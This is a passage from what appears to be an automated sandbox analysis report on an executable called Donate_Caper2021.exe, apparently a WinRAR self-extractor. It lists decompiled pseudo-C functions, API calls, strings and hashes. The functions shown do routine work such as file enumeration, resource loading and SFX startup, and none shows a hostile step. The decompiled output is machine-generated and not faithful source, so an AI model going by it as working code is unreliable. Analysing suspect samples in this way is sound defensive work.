						E0040634C(_t25, 0x432a6c, L"Maximum allowed array size (%u) is exceeded", _t14);
						E004062F7(0x432a6c);
					}
					_t15 =  *(_t35 + 8);
					_t33 =  *(_t35 + 4);
					_t16 = ( *(_t35 + 8) >> 2) + _t15 + 0x20;
					_t44 = _t33 - _t16;
					if(_t33 <= _t16) {
						_t33 = _t16;
					}
					_push(_t33 + _t33);
					_push( *_t35);
					_t18 = E00419E8C(_t21, _t33, _t35, _t44);
					_t22 = _t18;
					if(_t22 == 0) {
						_t18 = E004062F7(0x432a6c);
					}
					 *(_t35 + 8) = _t33;
					 *_t35 = _t22;
					return _t18;
				}
				return _t13;
			}

0x004011b4
0x004011b9
0x004011bb
0x004011be
0x004011c4
0x004011c6
0x004011c9
0x004011d3
0x004011e0
0x004011ea
0x004011ea
0x004011ef
0x004011f2
0x004011fa
0x004011fe
0x00401200
0x00401202
0x00401202
0x00401207
0x00401208
0x0040120a
0x0040120f
0x00401215
0x00401219
0x00401219
0x0040121e
0x00401223
0x00000000
0x00401225
0x00401227

APIs

_realloc.LIBCMT ref: 0040120A

Part of subcall function 0040634C: __vswprintf_c_l.LIBCMT ref: 0040636A

Strings

Maximum allowed array size (%u) is exceeded, xrefs: 004011DA
l*C, xrefs: 004011CC

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: __vswprintf_c_l_realloc
String ID: Maximum allowed array size (%u) is exceeded$l*C
API String ID: 620378156-1053225679
Opcode ID: 1e54c29b5058901571274e3d009f3c6e2adeabd777b102b54457675cc860a6dc
Instruction ID: 691b07bbb94128c6b82a20e8db061f726089adda179502cb65d420f78f9185e5
Opcode Fuzzy Hash: 1e54c29b5058901571274e3d009f3c6e2adeabd777b102b54457675cc860a6dc
Instruction Fuzzy Hash: 1F01D4722002025FD324EA95D49082BB3D9EF84314311443FED97D3691EA38BC408758

Uniqueness

Uniqueness Score: -1.00%

Function 00409E72, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409E72(signed short* _a4) {
				signed short _t5;
				signed int _t7;
				signed int _t10;
				signed int _t11;
				signed short* _t15;
				signed short* _t21;

				_t21 = _a4;
				if( *_t21 == 0 || _t21[1] == 0 || E0041C359( &(_t21[2]), 0x3a) == 0) {
					_t5 =  *_t21 & 0x0000ffff;
					_t15 = _t21;
					__eflags = _t5;
					if(_t5 == 0) {
						L13:
						__eflags = 0;
						return 0;
					}
					_t7 = _t5 & 0x0000ffff;
					while(1) {
						__eflags = _t7 - 0x20;
						if(__eflags < 0) {
							goto L3;
						}
						if(__eflags == 0) {
							L9:
							_t10 = E00409DC6(_t15[1] & 0x0000ffff);
							__eflags = _t10;
							if(_t10 != 0) {
								goto L3;
							}
							L10:
							_t15 =  &(_t15[1]);
							_t7 =  *_t15 & 0x0000ffff;
							__eflags = _t7;
							if(_t7 != 0) {
								continue;
							}
							_t11 = E0041C316(_t21, L"?*<>|\"");
							__eflags = _t11;
							if(_t11 != 0) {
								goto L13;
							}
							return _t11 + 1;
						}
						__eflags = _t7 - 0x2e;
						if(_t7 != 0x2e) {
							goto L10;
						}
						goto L9;
					}
					goto L3;
				} else {
					L3:
					return 0;
				}
			}

0x00409e73
0x00409e7b
0x00409e99
0x00409e9c
0x00409e9e
0x00409ea1
0x00409ee0
0x00409ee0
0x00000000
0x00409ee0
0x00409ea3
0x00409ea6
0x00409ea6
0x00409eaa
0x00000000
0x00000000
0x00409eac
0x00409eb4
0x00409eb9
0x00409ebe
0x00409ec0
0x00000000
0x00000000
0x00409ec2
0x00409ec3
0x00409ec4
0x00409ec7
0x00409eca
0x00000000
0x00000000
0x00409ed2
0x00409ed9
0x00409edb
0x00000000
0x00000000
0x00000000
0x00409edd
0x00409eae
0x00409eb2
0x00000000
0x00000000
0x00000000
0x00409eb2
0x00000000
0x00409e95
0x00409e95
0x00000000
0x00409e95

APIs

_wcschr.LIBCMT ref: 00409E8A
_wcspbrk.LIBCMT ref: 00409ED2

Strings

?*<>|", xrefs: 00409ECC

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcschr_wcspbrk
String ID: ?*<>|"
API String ID: 3305141221-226352099
Opcode ID: 7060e2060c51aebbd259e7a826b2c4d297ab0cfecc37e26e6a7a995e51a8c4fd
Instruction ID: aae40c83a8c34d14536adfead1796f521bb78b219cf54c02a184dd3faff2c2e2
Opcode Fuzzy Hash: 7060e2060c51aebbd259e7a826b2c4d297ab0cfecc37e26e6a7a995e51a8c4fd
Instruction Fuzzy Hash: 65F0815911422254DA38EA19D4016B322A89B16795B64883FE9C1B62D3EB7D9C82C1EC

Uniqueness

Uniqueness Score: -1.00%

Function 0041D8AB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0041D8AB(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t30 = __eflags;
				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t19 = __ebx;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E00419D21(__ebx, __edx, __edi, __esi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E0041E3B4(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E0041E3B4(_t19, _t26, _t27, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E00419CFA(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E0041D643(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}

0x0041d8ab
0x0041d8ab
0x0041d8ab
0x0041d8ab
0x0041d8ab
0x0041d8ae
0x0041d8b4
0x0041d8c2
0x0041d8c8
0x0041d8d0
0x0041d8dc
0x0041d8e4
0x0041d8ec
0x0041d900
0x0041d902
0x0041d906
0x0041d90b
0x0041d911
0x0041d913
0x0041d915
0x0041d918
0x00000000
0x0041d91f
0x0041d913
0x0041d906
0x0041d900
0x0041d8ec
0x0041d920

APIs

Part of subcall function 00419D21: __getptd.LIBCMT ref: 00419D27
Part of subcall function 00419D21: __getptd.LIBCMT ref: 00419D37

__getptd.LIBCMT ref: 0041D8BA

Part of subcall function 0041E3B4: __getptd_noexit.LIBCMT ref: 0041E3B7
Part of subcall function 0041E3B4: __amsg_exit.LIBCMT ref: 0041E3C4

__getptd.LIBCMT ref: 0041D8C8

Strings

csm, xrefs: 0041D8D6

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 267494d8b8f866417e3709aead5cd1e1caea0c3431e07837695da3a1140e8ec9
Instruction ID: 4dc330cfc770cff172f06f0099fa0da7c57abf5081ac8ad936c55a346df6a5ac
Opcode Fuzzy Hash: 267494d8b8f866417e3709aead5cd1e1caea0c3431e07837695da3a1140e8ec9
Instruction Fuzzy Hash: EB014BB4C002188ACF389F66D4806EEB3B6AF14311F14442FE85956791DB389EC0CB4D

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Donate_Caper2021.exe PID: 7052 Parent PID: 6948 Donate_Caper2021.exeCOMMON

Executed Functions

Function 0017D5D4, Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197
filesleeptimeCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0017D5D4(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a84, void* _a86, void* _a90, void* _a92, void* _a94, void* _a96, void* _a98, void* _a100, void* _a104, void* _a144, void* _a148, void* _a196) {
				char _v208;
				void* __ebx;
				void* __edi;
				void* _t41;
				void* _t42;
				long _t51;
				void* _t54;
				intOrPtr _t58;
				struct HWND__* _t74;
				void* _t75;
				WCHAR* _t94;
				struct HINSTANCE__* _t95;
				intOrPtr _t96;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t121;

				_t121 = __fp0;
				_t99 = __ebp;
				_t88 = __edx;
				E001700CF(__edx, 1);
				E00179DA4("C:\Users\jones\AppData\Roaming", 0x800);
				E0017A335( &_v208); // executed
				E001713B3(0x1a81e0);
				_t74 = 0;
				E0017F350(0x7104, 0x1b6b80, 0, 0x7104);
				_t102 = _t101 + 0xc;
				_t94 = GetCommandLineW();
				_t106 = _t94;
				if(_t94 != 0) {
					_push(_t94);
					E0017BC84(0, _t106);
					if( *0x1aa471 == 0) {
						E0017D287(__eflags, _t94); // executed
					} else {
						_push(__ebp);
						_t100 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
						if(_t100 != 0) {
							UnmapViewOfFile(_t75);
							_t74 = 0;
						}
						CloseHandle(_t100);
						_pop(_t99);
					}
				}
				GetModuleFileNameW(_t74, 0x1bdc90, 0x800);
				SetEnvironmentVariableW(L"sfxname", 0x1bdc90);
				GetLocalTime(_t102 + 0xc);
				_push( *(_t102 + 0x1a) & 0x0000ffff);
				_push( *(_t102 + 0x1c) & 0x0000ffff);
				_push( *(_t102 + 0x1e) & 0x0000ffff);
				_push( *(_t102 + 0x20) & 0x0000ffff);
				_push( *(_t102 + 0x22) & 0x0000ffff);
				_push( *(_t102 + 0x22) & 0x0000ffff);
				E0016400A(_t102 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t102 + 0x24) & 0x0000ffff);
				_t103 = _t102 + 0x28;
				SetEnvironmentVariableW(L"sfxstime", _t103 + 0x7c); // executed
				_t95 = GetModuleHandleW(_t74);
				 *0x1a0ed4 = _t95;
				 *0x1a0ed0 = _t95; // executed
				_t41 = LoadIconW(_t95, 0x64); // executed
				 *0x1ac574 = _t41; // executed
				_t42 = E0017ADED(0x1a81e0, _t88, _t121); // executed
				 *0x1b6b7c = _t42;
				E0016D31C(0x1a0ee8, _t88, _t99, 0x1bdc90);
				E00178835(0);
				E00178835(0);
				 *0x1a8440 = _t103 + 0x5c;
				 *0x1a8444 = _t103 + 0x30; // executed
				DialogBoxParamW(_t95, L"STARTDLG", _t74, E0017AEE0, _t74); // executed
				 *0x1a8444 = _t74;
				 *0x1a8440 = _t74;
				E001788F3(_t103 + 0x24);
				E001788F3(_t103 + 0x50);
				_t51 =  *0x1beca0;
				if(_t51 != 0) {
					Sleep(_t51);
				}
				if( *0x1a9468 != 0) {
					E0017A544(0x1bdc90);
				}
				E0016EB27(0x1b6a78);
				if( *0x1a843c > 0) {
					L001835CE( *0x1a8438);
				}
				DeleteObject( *0x1ac574);
				_t54 =  *0x1b6b7c;
				if(_t54 != 0) {
					DeleteObject(_t54);
				}
				if( *0x1a0f50 == 0 &&  *0x1a8450 != 0) {
					E00166FC6(0x1a0f50, 0xff);
				}
				_t55 =  *0x1beca4;
				 *0x1a8450 = 1;
				if( *0x1beca4 != 0) {
					E0017D2E6(_t55);
					CloseHandle( *0x1beca4);
				}
				_t96 =  *0x1a0f50; // 0x0
				if( *0x1bec99 != 0) {
					_t58 =  *0x19e5fc; // 0x3e8
					if( *0x1bec9a == 0) {
						__eflags = _t58;
						if(_t58 < 0) {
							_t96 = _t96 - _t58;
							__eflags = _t96;
						}
					} else {
						_t96 =  *0x1bec9c;
						if(_t58 > 0) {
							_t96 = _t96 + _t58;
						}
					}
				}
				E0017A39D(_t103 + 0x1c); // executed
				return _t96;
			}

0x0017d5d4
0x0017d5d4
0x0017d5d4
0x0017d5df
0x0017d5ee
0x0017d5f7
0x0017d601
0x0017d60b
0x0017d614
0x0017d619
0x0017d622
0x0017d624
0x0017d626
0x0017d628
0x0017d629
0x0017d634
0x0017d6a1
0x0017d636
0x0017d636
0x0017d649
0x0017d64d
0x0017d68e
0x0017d694
0x0017d694
0x0017d697
0x0017d69d
0x0017d69d
0x0017d634
0x0017d6b2
0x0017d6be
0x0017d6c9
0x0017d6d4
0x0017d6da
0x0017d6e0
0x0017d6e6
0x0017d6ec
0x0017d6f2
0x0017d708
0x0017d70d
0x0017d71a
0x0017d727
0x0017d72c
0x0017d732
0x0017d738
0x0017d73e
0x0017d743
0x0017d74e
0x0017d753
0x0017d75c
0x0017d765
0x0017d775
0x0017d784
0x0017d789
0x0017d793
0x0017d799
0x0017d79f
0x0017d7a8
0x0017d7ad
0x0017d7b4
0x0017d7b7
0x0017d7b7
0x0017d7c4
0x0017d7c6
0x0017d7c6
0x0017d7d0
0x0017d7dc
0x0017d7e4
0x0017d7e9
0x0017d7f0
0x0017d7f6
0x0017d7fd
0x0017d800
0x0017d800
0x0017d80d
0x0017d822
0x0017d822
0x0017d827
0x0017d82c
0x0017d835
0x0017d838
0x0017d843
0x0017d843
0x0017d850
0x0017d856
0x0017d85f
0x0017d864
0x0017d874
0x0017d876
0x0017d878
0x0017d878
0x0017d878
0x0017d866
0x0017d866
0x0017d86e
0x0017d870
0x0017d870
0x0017d86e
0x0017d864
0x0017d87e
0x0017d88e

APIs

Part of subcall function 001700CF: GetModuleHandleW.KERNEL32(kernel32), ref: 001700E4
Part of subcall function 001700CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001700F6
Part of subcall function 001700CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00170127

Part of subcall function 00179DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00179DAC

Part of subcall function 0017A335: OleInitialize.OLE32(00000000), ref: 0017A34E
Part of subcall function 0017A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0017A385
Part of subcall function 0017A335: SHGetMalloc.SHELL32(001A8430), ref: 0017A38F

Part of subcall function 001713B3: GetCPInfo.KERNEL32(00000000,?), ref: 001713C4
Part of subcall function 001713B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 001713D8

GetCommandLineW.KERNEL32 ref: 0017D61C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0017D643
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0017D654
UnmapViewOfFile.KERNEL32(00000000), ref: 0017D68E

Part of subcall function 0017D287: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0017D29D
Part of subcall function 0017D287: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0017D2D9

CloseHandle.KERNEL32(00000000), ref: 0017D697
GetModuleFileNameW.KERNEL32(00000000,001BDC90,00000800), ref: 0017D6B2
SetEnvironmentVariableW.KERNEL32(sfxname,001BDC90), ref: 0017D6BE
GetLocalTime.KERNEL32(?), ref: 0017D6C9
_swprintf.LIBCMT ref: 0017D708
SetEnvironmentVariableW.KERNELBASE(sfxstime,?), ref: 0017D71A
GetModuleHandleW.KERNEL32(00000000), ref: 0017D721
LoadIconW.USER32(00000000,00000064), ref: 0017D738
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0017D789
Sleep.KERNEL32(?), ref: 0017D7B7
DeleteObject.GDI32 ref: 0017D7F0
DeleteObject.GDI32(?), ref: 0017D800
CloseHandle.KERNEL32 ref: 0017D843

Strings

STARTDLG, xrefs: 0017D77E
winrarsfxmappingfile.tmp, xrefs: 0017D637
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0017D6F9
sfxname, xrefs: 0017D6B9
sfxstime, xrefs: 0017D715
C:\Users\user\AppData\Roaming, xrefs: 0017D5E9

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Roaming$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 788466649-497829426
Opcode ID: 3b8ac74240bc0946e6c57185cfebe2eda433f8867de03bc3d499bc7a035f9dd8
Instruction ID: 7ffcd9860b9d64d6b57945e860674cd8cc6088d7e9153c84592332db2fd404a6
Opcode Fuzzy Hash: 3b8ac74240bc0946e6c57185cfebe2eda433f8867de03bc3d499bc7a035f9dd8
Instruction Fuzzy Hash: 8261F371904344AFD321AFB5EC49F6B3BB8BF59740F044429F549925A2DB78CD84C762

Uniqueness

Uniqueness Score: -1.00%

Function 00179E1C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00179E1C(WCHAR* _a4) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr* _v28;
				void* __ecx;
				struct HRSRC__* _t14;
				char _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t26;
				char* _t33;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				long _t44;
				intOrPtr* _t46;
				struct HRSRC__* _t47;

				_t14 = FindResourceW( *0x1a0ed0, _a4, "PNG");
				_t47 = _t14;
				if(_t47 == 0) {
					return _t14;
				}
				_t44 = SizeofResource( *0x1a0ed0, _t47);
				if(_t44 == 0) {
					L4:
					_t16 = 0;
					L16:
					return _t16;
				}
				_t17 = LoadResource( *0x1a0ed0, _t47);
				if(_t17 == 0) {
					goto L4;
				}
				_t18 = LockResource(_t17);
				_t48 = _t18;
				if(_t18 != 0) {
					_v4 = 0;
					_t19 = GlobalAlloc(2, _t44); // executed
					_t35 = _t19;
					if(_t35 == 0) {
						L15:
						_t16 = _v4;
						goto L16;
					}
					if(GlobalLock(_t35) == 0) {
						L14:
						GlobalFree(_t35);
						goto L15;
					}
					E0017F4B0(_t20, _t48, _t44);
					_v8 = 0;
					_push( &_v8);
					_push(0);
					_push(_t35);
					if( *0x1c2178() == 0) {
						_t26 = E00179D7B(_t24, _t37, _v20, 0); // executed
						_t38 = _v28;
						_t46 = _t26;
						 *0x193260(_t38);
						 *((intOrPtr*)( *((intOrPtr*)( *_t38 + 8))))();
						if(_t46 != 0) {
							 *((intOrPtr*)(_t46 + 8)) = 0;
							if( *((intOrPtr*)(_t46 + 8)) == 0) {
								_push(0xffffff);
								_t33 =  &_v20;
								_push(_t33);
								_push( *((intOrPtr*)(_t46 + 4)));
								L0017E238(); // executed
								if(_t33 != 0) {
									 *((intOrPtr*)(_t46 + 8)) = _t33;
								}
							}
							 *0x193260(1);
							 *((intOrPtr*)( *((intOrPtr*)( *_t46))))();
						}
					}
					GlobalUnlock(_t35);
					goto L14;
				}
				goto L4;
			}

0x00179e2e
0x00179e34
0x00179e38
0x00179f32
0x00179f32
0x00179e4c
0x00179e50
0x00179e70
0x00179e70
0x00179f2e
0x00000000
0x00179f2e
0x00179e59
0x00179e61
0x00000000
0x00000000
0x00179e64
0x00179e6a
0x00179e6e
0x00179e7e
0x00179e82
0x00179e88
0x00179e8c
0x00179f28
0x00179f28
0x00000000
0x00179f2d
0x00179e9b
0x00179f21
0x00179f22
0x00000000
0x00179f22
0x00179ea4
0x00179eac
0x00179eb4
0x00179eb5
0x00179eb6
0x00179ebf
0x00179ec6
0x00179ecb
0x00179ecf
0x00179ed9
0x00179edf
0x00179ee3
0x00179ee8
0x00179eed
0x00179eef
0x00179ef4
0x00179ef8
0x00179ef9
0x00179efc
0x00179f03
0x00179f05
0x00179f05
0x00179f03
0x00179f10
0x00179f18
0x00179f18
0x00179ee3
0x00179f1b
0x00000000
0x00179f1b
0x00000000

APIs

FindResourceW.KERNEL32(0017AE4D,PNG,?,?,?,0017AE4D,00000066), ref: 00179E2E
SizeofResource.KERNEL32(00000000,00000000,?,?,?,0017AE4D,00000066), ref: 00179E46
LoadResource.KERNEL32(00000000,?,?,?,0017AE4D,00000066), ref: 00179E59
LockResource.KERNEL32(00000000,?,?,?,0017AE4D,00000066), ref: 00179E64
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0017AE4D,00000066), ref: 00179E82
GlobalLock.KERNEL32 ref: 00179E93
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00179EFC
GlobalUnlock.KERNEL32(00000000), ref: 00179F1B
GlobalFree.KERNEL32 ref: 00179F22

Strings

PNG, xrefs: 00179E1F

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
String ID: PNG
API String ID: 4097654274-364855578
Opcode ID: 394b08c21022f4bb6939aef57f3657c2baf41b2513b5c79e00dcda2bf10e910d
Instruction ID: dcc0d10ce266c917c03a62230531cacd8eda3203f99ca0a3a8d5d52dc3552580
Opcode Fuzzy Hash: 394b08c21022f4bb6939aef57f3657c2baf41b2513b5c79e00dcda2bf10e910d
Instruction Fuzzy Hash: E831A071208306AFC7119F65DC48E2BBFBDFF89751B04852AF81AD2660EB31DC44DAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0016A5F4, Relevance: 7.6, APIs: 5, Instructions: 107
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0016A5F4(void* __edx, intOrPtr _a4, intOrPtr _a8, char _a32, short _a592, void* _a4692, WCHAR* _a4696, intOrPtr _a4700) {
				struct _WIN32_FIND_DATAW _v0;
				char _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _t43;
				signed int _t49;
				signed int _t63;
				void* _t65;
				long _t68;
				char _t69;
				void* _t73;
				signed int _t74;
				void* _t75;
				void* _t81;
				intOrPtr _t83;
				void* _t86;

				_t81 = __edx;
				E0017E360();
				_push(_t74);
				_t86 = _a4692;
				_t83 = _a4700;
				_t75 = _t74 | 0xffffffff;
				_push( &_v0);
				if(_t86 != _t75) {
					_t43 = FindNextFileW(_t86, ??);
					__eflags = _t43;
					if(_t43 == 0) {
						_t86 = _t75;
						_t63 = GetLastError();
						__eflags = _t63 - 0x12;
						_t11 = _t63 != 0x12;
						__eflags = _t11;
						 *((char*)(_t83 + 0x1044)) = _t63 & 0xffffff00 | _t11;
					}
					__eflags = _t86 - _t75;
					if(_t86 != _t75) {
						goto L13;
					}
				} else {
					_t65 = FindFirstFileW(_a4696, ??); // executed
					_t86 = _t65;
					if(_t86 != _t75) {
						L13:
						E0016FE56(_t83, _a4696, 0x800);
						_push(0x800);
						E0016BCFB(__eflags, _t83,  &_a32);
						_t49 = 0 + _a8;
						__eflags = _t49;
						 *(_t83 + 0x1000) = _t49;
						asm("adc ecx, 0x0");
						 *((intOrPtr*)(_t83 + 0x1008)) = _v24;
						 *((intOrPtr*)(_t83 + 0x1028)) = _v20;
						 *((intOrPtr*)(_t83 + 0x102c)) = _v16;
						 *((intOrPtr*)(_t83 + 0x1030)) = _v12;
						 *((intOrPtr*)(_t83 + 0x1034)) = _v8;
						 *((intOrPtr*)(_t83 + 0x1038)) = _v4;
						 *(_t83 + 0x103c) = _v0.dwFileAttributes;
						 *((intOrPtr*)(_t83 + 0x1004)) = _a4;
						E00170E19(_t83 + 0x1010, _t81,  &_v4);
						E00170E19(_t83 + 0x1018, _t81,  &_v24);
						E00170E19(_t83 + 0x1020, _t81,  &_v20);
					} else {
						if(E0016B66C(_a4696,  &_a592, 0x800) == 0) {
							L4:
							_t68 = GetLastError();
							if(_t68 == 2 || _t68 == 3 || _t68 == 0x12) {
								_t69 = 0;
								__eflags = 0;
							} else {
								_t69 = 1;
							}
							 *((char*)(_t83 + 0x1044)) = _t69;
						} else {
							_t73 = FindFirstFileW( &_a592,  &_v0); // executed
							_t86 = _t73;
							if(_t86 != _t75) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t83 + 0x1040) =  *(_t83 + 0x1040) & 0x00000000;
				return _t86;
			}

0x0016a5f4
0x0016a5f9
0x0016a5fe
0x0016a601
0x0016a60d
0x0016a614
0x0016a61c
0x0016a61f
0x0016a692
0x0016a698
0x0016a69a
0x0016a69c
0x0016a69e
0x0016a6a4
0x0016a6a7
0x0016a6a7
0x0016a6aa
0x0016a6aa
0x0016a6b0
0x0016a6b2
0x00000000
0x00000000
0x0016a621
0x0016a628
0x0016a62e
0x0016a632
0x0016a6b8
0x0016a6c1
0x0016a6c6
0x0016a6cd
0x0016a6d8
0x0016a6d8
0x0016a6dc
0x0016a6e6
0x0016a6e9
0x0016a6f3
0x0016a6fd
0x0016a707
0x0016a711
0x0016a71b
0x0016a725
0x0016a72f
0x0016a73c
0x0016a74c
0x0016a75c
0x0016a638
0x0016a64f
0x0016a66a
0x0016a66a
0x0016a673
0x0016a684
0x0016a684
0x0016a67f
0x0016a681
0x0016a681
0x0016a686
0x0016a651
0x0016a65e
0x0016a664
0x0016a668
0x00000000
0x00000000
0x00000000
0x00000000
0x0016a668
0x0016a64f
0x0016a632
0x0016a761
0x0016a774

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0016A4EF,000000FF,?,?), ref: 0016A628
FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0016A4EF,000000FF,?,?), ref: 0016A65E
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0016A4EF,000000FF,?,?), ref: 0016A66A
FindNextFileW.KERNEL32(?,?,?,?,?,?,0016A4EF,000000FF,?,?), ref: 0016A692
GetLastError.KERNEL32(?,?,?,?,0016A4EF,000000FF,?,?), ref: 0016A69E

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: ddfa11c924e4330e5c32eba0fd2eab0b144289f932d6d294f5370fff7eb8831a
Instruction ID: ce551cd383a94905a7b33177dd9aa1d8e517315387e29d4a4ae37efcfafe4f06
Opcode Fuzzy Hash: ddfa11c924e4330e5c32eba0fd2eab0b144289f932d6d294f5370fff7eb8831a
Instruction Fuzzy Hash: 1D416372504241AFC324EF68CC84ADAF7E8BF58344F054A2AF5A9D3250D775A9648FA2

Uniqueness

Uniqueness Score: -1.00%

Function 0018753D, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

